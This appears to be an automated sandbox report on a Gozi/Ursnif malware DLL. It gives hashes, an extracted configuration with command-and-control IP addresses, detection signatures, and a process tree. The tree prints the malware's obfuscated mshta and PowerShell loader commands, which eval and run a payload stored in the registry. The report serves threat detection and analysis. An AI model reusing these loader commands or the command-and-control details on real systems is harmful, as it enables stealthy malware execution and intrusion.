Analysis
- max time kernel: 234s
- max time network: 235s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 07-07-2022 10:32

Static task: static1
Behavioral task: behavioral1
Sample: 62c6b5af0566b.dll
Resource: win7-20220414-en
General
- Target: 62c6b5af0566b.dll
- Size: 432KB
- MD5: 82186dbbba674eaeed2b4bb95a5a9fac
- SHA1: 00d0e69a746d05039b63fdd94eb2bce6ce27a4a7
- SHA256: 251b7936786ed9284ce06582007fe75c3bc301fd0f1060fa53e71e54aff28a7f
- SHA512: 91ba44bf86c583ae28a09c20bebd7b6a9d253e690ce3f358b669d48d17980f0a9b7a40acaa9325f773504bb98edcc9e8edd252716628dd7a79e5394e06d782b4
Malware Config
Extracted
- Family: gozi_ifsb
- 3000
- config.edge.skype.com
- 79.110.52.164
- 79.110.52.97
- base_path: /drew/
- build: 250239
- exe_type: loader
- extension: .jlk
- server_id: 50
Signatures
- suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
- suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
- Blocklisted process makes network request (2 IoCs)
  Processes: rundll32.exe
    flow  pid   process
    30    3056  rundll32.exe
    69    3056  rundll32.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes: mshta.exe
    description        ioc                                                                                                   process
    Key value queried  \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation  mshta.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: rundll32.exe, powershell.exe
    pid   process
    3056  rundll32.exe
    3056  rundll32.exe
    1596  powershell.exe
    1596  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
    description              pid   process
    Token: SeDebugPrivilege  1596  powershell.exe
- Suspicious use of WriteProcessMemory (13 IoCs)
  Processes: rundll32.exe, mshta.exe, powershell.exe, csc.exe, csc.exe
    description                       pid   process         target process
    PID 3372 wrote to memory of 3056  3372  rundll32.exe    rundll32.exe
    PID 3372 wrote to memory of 3056  3372  rundll32.exe    rundll32.exe
    PID 3372 wrote to memory of 3056  3372  rundll32.exe    rundll32.exe
    PID 3904 wrote to memory of 1596  3904  mshta.exe       powershell.exe
    PID 3904 wrote to memory of 1596  3904  mshta.exe       powershell.exe
    PID 1596 wrote to memory of 1428  1596  powershell.exe  csc.exe
    PID 1596 wrote to memory of 1428  1596  powershell.exe  csc.exe
    PID 1428 wrote to memory of 2240  1428  csc.exe         cvtres.exe
    PID 1428 wrote to memory of 2240  1428  csc.exe         cvtres.exe
    PID 1596 wrote to memory of 2372  1596  powershell.exe  csc.exe
    PID 1596 wrote to memory of 2372  1596  powershell.exe  csc.exe
    PID 2372 wrote to memory of 1912  2372  csc.exe         cvtres.exe
    PID 2372 wrote to memory of 1912  2372  csc.exe         cvtres.exe
Processes (indented entries are children of the process above them)
- C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\62c6b5af0566b.dll,#1
  Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\rundll32.exe
      Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\62c6b5af0566b.dll,#1
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses
- C:\Windows\System32\mshta.exe
  Command line: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Rbvu='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbvu).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C012F697-1F67-F289-A9F4-C346ED68A7DA\\\DriverUrls'));if(!window.flag)close()</script>"
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wukqui -value gp; new-alias -name embhyopb -value iex; embhyopb ([System.Text.Encoding]::ASCII.GetString((wukqui "HKCU:Software\AppDataLow\Software\Microsoft\C012F697-1F67-F289-A9F4-C346ED68A7DA").CollectByte))
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z0024kvt\z0024kvt.cmdline"
          Signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF34F.tmp" "c:\Users\Admin\AppData\Local\Temp\z0024kvt\CSCBAFBBC4C84C429C855DF86DB8C255F5.TMP"
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4umy5urv\4umy5urv.cmdline"
          Signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF497.tmp" "c:\Users\Admin\AppData\Local\Temp\4umy5urv\CSCF166E4CE9AF34A388A4C98E3C227F91.TMP"
Downloads